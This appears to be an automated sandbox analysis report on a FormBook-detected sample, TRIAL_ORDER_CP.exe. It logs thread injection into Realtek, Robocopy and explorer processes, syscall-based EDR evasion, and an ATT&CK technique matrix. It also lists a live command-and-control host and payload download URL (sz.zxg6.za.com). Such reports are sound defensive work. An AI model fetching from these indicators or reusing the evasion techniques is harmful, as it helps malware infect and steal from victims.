        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B31514 mov eax, dword ptr fs:[00000030h]

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x47428DD
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtResumeThread: Direct from: 0x4742954
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | NtClose: Indirect: 0x3380F5FE
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFBD8CE2651
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | NtSetContextThread: Indirect: 0x33813819
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x474270E
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x7FFBA5959E7F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | NtQueueApcThread: Indirect: 0x3380F56A
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | NtResumeThread: Indirect: 0x33813E59
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | NtSuspendThread: Indirect: 0x33813B39
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x474A4BB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Section loaded: NULL target: C:\Windows\SysWOW64\Robocopy.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\Robocopy.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
        Source: C:\Windows\SysWOW64\Robocopy.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\Robocopy.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Thread register set: target process: 5968
        Source: C:\Windows\SysWOW64\Robocopy.exe | Thread register set: target process: 5968
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Process created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: RAVCpl64.exe, 00000005.00000002.275186471601.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.270887794668.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275185902479.0000000001390000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match | File source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 312 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph
        Behavior Graph ID: 1500398 | Sample: TRIAL_ORDER_CP.exe | Startdate: 28/08/2024 | Architecture: WINDOWS | Score: 100
        Start
          DNS/IP: sz.zxg6.za.com
          Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures
          -> TRIAL_ORDER_CP.exe 1 39 (started)
               Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32; C:\Users\user\AppData\Local\...\UserInfo.dll, PE32; 2 other files (none is malicious)
               Signatures: Switches to a custom stack to bypass stack traces
               -> TRIAL_ORDER_CP.exe 6 (started)
                    DNS/IP: sz.zxg6.za.com 38.242.218.41, 49865, 80 NATIXISUS United States
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection); Found direct / indirect Syscall (likely to bypass EDR)
                    -> RAVCpl64.exe (injected)
                         Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                         -> Robocopy.exe (started)
                              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                              -> explorer.exe 52 1 (injected)

        Source | Detection | Scanner | Label
        TRIAL_ORDER_CP.exe | 26% | ReversingLabs | Win32.Trojan.Garf
        TRIAL_ORDER_CP.exe | 100% | Joe Sandbox ML |
        TRIAL_ORDER_CP.exe | 42% | Virustotal |
        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\LangDLL.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\System.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\UserInfo.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsDialogs.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsl154E.tmp\nsExec.dll | 0% | ReversingLabs |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label
        https://www.msn.com/en-us/news/crime/police-warn-aggressive-water-buffalo-has-been-on-the-loose-for- | 0% | Avira URL Cloud | safe
        https://www.energy.gov/energysaver/why-energy-efficiency-matters | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/ | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.coC | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/money/realestate/i-m-an-economist-here-s-my-prediction-for-the-housing-mar | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ | 0% | Virustotal |
        https://www.cbsnews.com/news/saying-goodbye-to-young-sheldon/ | 0% | Avira URL Cloud | safe
        https://www.pollensense.com/ | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/ | 0% | Virustotal |
        https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_ | 0% | Avira URL Cloud | safe
        https://api.msn.com:443/v1/news/Feed/Windows? | 0% | Avira URL Cloud | safe
        https://wns.windows.com/EXE.15 | 0% | Avira URL Cloud | safe
        https://www.energy.gov/energysaver/why-energy-efficiency-matters | 0% | Virustotal |
        https://www.pollensense.com/ | 0% | Virustotal |
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe
        https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_ | 0% | Virustotal |
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/ | 0% | Avira URL Cloud | safe
        https://excel.office.com | 0% | Avira URL Cloud | safe
        https://api.msn.com:443/v1/news/Feed/Windows? | 0% | Virustotal |
        https://www.msn.com/en-us/health/wellness/actress-malinda-williams-recognized-for-films-like-soul-fo | 0% | Avira URL Cloud | safe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | 0% | Avira URL Cloud | safe
        http://schemas.micro | 0% | Avira URL Cloud | safe
        https://wns.windows.com/EXE.15 | 0% | Virustotal |
        http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe
        https://powerpoint.office.comEM | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/ | 0% | Virustotal |
        https://android.notify.windows.com/iOSB | 0% | Avira URL Cloud | safe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8 | 0% | Avira URL Cloud | safe
        https://aka.ms/odirm | 0% | Avira URL Cloud | safe
        https://excel.office.com | 0% | Virustotal |
        http://sz.zxg6.za.com/.ex/ELFyaa85.bin | 0% | Avira URL Cloud | safe
        https://android.notify.windows.com/iOStore_8wec | 0% | Avira URL Cloud | safe
        https://android.notify.windows.com/iOSB | 0% | Virustotal |
        https://www.msn.com/en-us/weather/maps/airqualitystation/in-Washington%2CDistrict-of-Columbia?loc=ey | 0% | Avira URL Cloud | safe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-dark | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8 | 0% | Virustotal |
        https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=6c321c39-81be-4f44-a39d-6068 | 0% | Avira URL Cloud | safe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Virustotal |
        https://aka.ms/odirm | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-dark | 0% | Virustotal |
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew | 0% | Avira URL Cloud | safe
        https://youtu.be/1uIizdaJhMI | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/entertainment/news/the-best-big-bang-theory-episode-of-all-time-according- | 0% | Avira URL Cloud | safe
        https://android.notify.wy | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.png | 0% | Avira URL Cloud | safe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/ | 0% | Avira URL Cloud | safe
        https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew | 0% | Virustotal |
        https://www.msn.com/en-us/news/politics/new-trump-indictment-loses-some-allegations-related-to-jan-6 | 0% | Avira URL Cloud | safe
        https://api.msn.com:443/v1/news/Feed/Windows?$ | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.svg | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/ | 0% | Virustotal |
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Virustotal |
        https://youtu.be/1uIizdaJhMI | 0% | Virustotal |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-dark | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/money/companies/another-popular-ice-cream-brand-files-for-chapter-11-bankr | 0% | Avira URL Cloud | safe
        https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.png | 0% | Virustotal |
        https://www.msn.com/en-us/money/companies/elon-musk-s-strange-new-rule-for-x-employees-could-cause-t | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/play/games/idle-mining- | 0% | Avira URL Cloud | safe
        https://android.notify.windows.com/iOSyb3d8bbw | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-dark | 0% | Virustotal |
        https://www.msn.com/en-us/lifestyle/cleaning-and-organizing/the-common-household-ingredient-that-can | 0% | Avira URL Cloud | safe
        http://sz.zxg6.za.com/.ex/ELFyaa85.binAwarTrowww.kapiextra.com/ELFyaa85.bin | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/entertainment/news/best-movies-now-on-netflix/ss-BB1qpNv8 | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8 | 0% | Avira URL Cloud | safe
        https://word.office.com | 0% | Avira URL Cloud | safe
        https://api.msn.com/v1/news/Feed/Windows?= | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/weather/maps/severeweather/in-Washington%2CDistrict-of-Columbia?loc=eyJsIj | 0% | Avira URL Cloud | safe
        http://nsis.sf.net/NSIS_ErrorError | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark | 0% | Avira URL Cloud | safe
        http://www.foreca.com | 0% | Avira URL Cloud | safe
        https://outlook.com | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/tv/news/c | 0% | Avira URL Cloud | safe
        https://www.msn.com/e | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_TH_Y.svg | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC-dark | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/entertainment/news/the-28-most-dazzling-red-carpet-beauty-looks-ever/ss-AA | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/play/games/farm-merge-valley/cg-9nf2hg8fnlts | 0% | Avira URL Cloud | safe
        https://wealthofgeeks.com/the-best-tv-anti-heroes/ | 0% | Avira URL Cloud | safe
        https://api.msn.com/v1/news/Feed/Windows?activityId=409F83E3643B46AFA5176A6D0817A617&timeOut=5000&oc | 0% | Avira URL Cloud | safe
        https://www.msn.com/eP | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W33_Clea | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.svg | 0% | Avira URL Cloud | safe
        https://excel.office.comS | 0% | Avira URL Cloud | safe
        https://android.notify.windows.com/iOSXboxGamew | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/weather/forecast/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjoiV2FzaGlu | 0% | Avira URL Cloud | safe
        https://android.notify.windows.com/iOS | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/health/medical/the-slow-and-steady-growth-of-trilobites/ar-AA1lcBT3 | 0% | Avira URL Cloud | safe
        https://www.msn.com/en-us/sports/motorsports/travis-kelce-buys-an-ownership-stake-in-a-racehorse-nam | 0% | Avira URL Cloud | safe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | 0% | Avira URL Cloud | safe
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRnR-dark | 0% | Avira URL Cloud | safe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Avira URL Cloud | safe
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppQ | 0% | Avira URL Cloud | safe
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.png | 0% | Avira URL Cloud | safe
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        sz.zxg6.za.com | 38.242.218.41 | true | false
          unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://sz.zxg6.za.com/.ex/ELFyaa85.bin | false
          • Avira URL Cloud: safe
          unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/ | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/news/crime/police-warn-aggressive-water-buffalo-has-been-on-the-loose-for- | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.coC | explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp | false
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ | explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://www.energy.gov/energysaver/why-energy-efficiency-matters | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/realestate/i-m-an-economist-here-s-my-prediction-for-the-housing-mar | explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp | false
          • Avira URL Cloud: safe
          unknown
          https://www.cbsnews.com/news/saying-goodbye-to-young-sheldon/ | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • Avira URL Cloud: safe
          unknown
          https://www.pollensense.com/ | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_ | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://wns.windows.com/EXE.15 | explorer.exe, 00000007.00000002.275198272389.000000000D5D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436916001.000000000D5D1000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp | false
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/ | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://excel.office.com | explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/health/wellness/actress-malinda-williams-recognized-for-films-like-soul-fo | explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • Avira URL Cloud: safe
          unknown
          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000626000.00000020.00000001.01000000.0000000B.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          http://schemas.micro | explorer.exe, 00000007.00000002.275186219956.0000000002960000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275193654796.0000000009C20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.272433570950.000000000AB90000.00000002.00000001.00040000.00000000.sdmp | false
          • Avira URL Cloud: safe
          unknown
          http://www.gopher.ftp://ftp. | TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp | false
          • Avira URL Cloud: safe
          unknown
          https://powerpoint.office.comEM | explorer.exe, 00000007.00000002.275197435549.000000000D413000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436256660.000000000D413000.00000004.00000001.00020000.00000000.sdmp | false
          • Avira URL Cloud: safe
          unknown
          https://android.notify.windows.com/iOSB | explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8 | explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp | false
          • 0%, Virustotal
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/odirmexplorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://android.notify.windows.com/iOStore_8wecexplorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/weather/maps/airqualitystation/in-Washington%2CDistrict-of-Columbia?loc=eyexplorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdTRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-darkexplorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=6c321c39-81be-4f44-a39d-6068explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
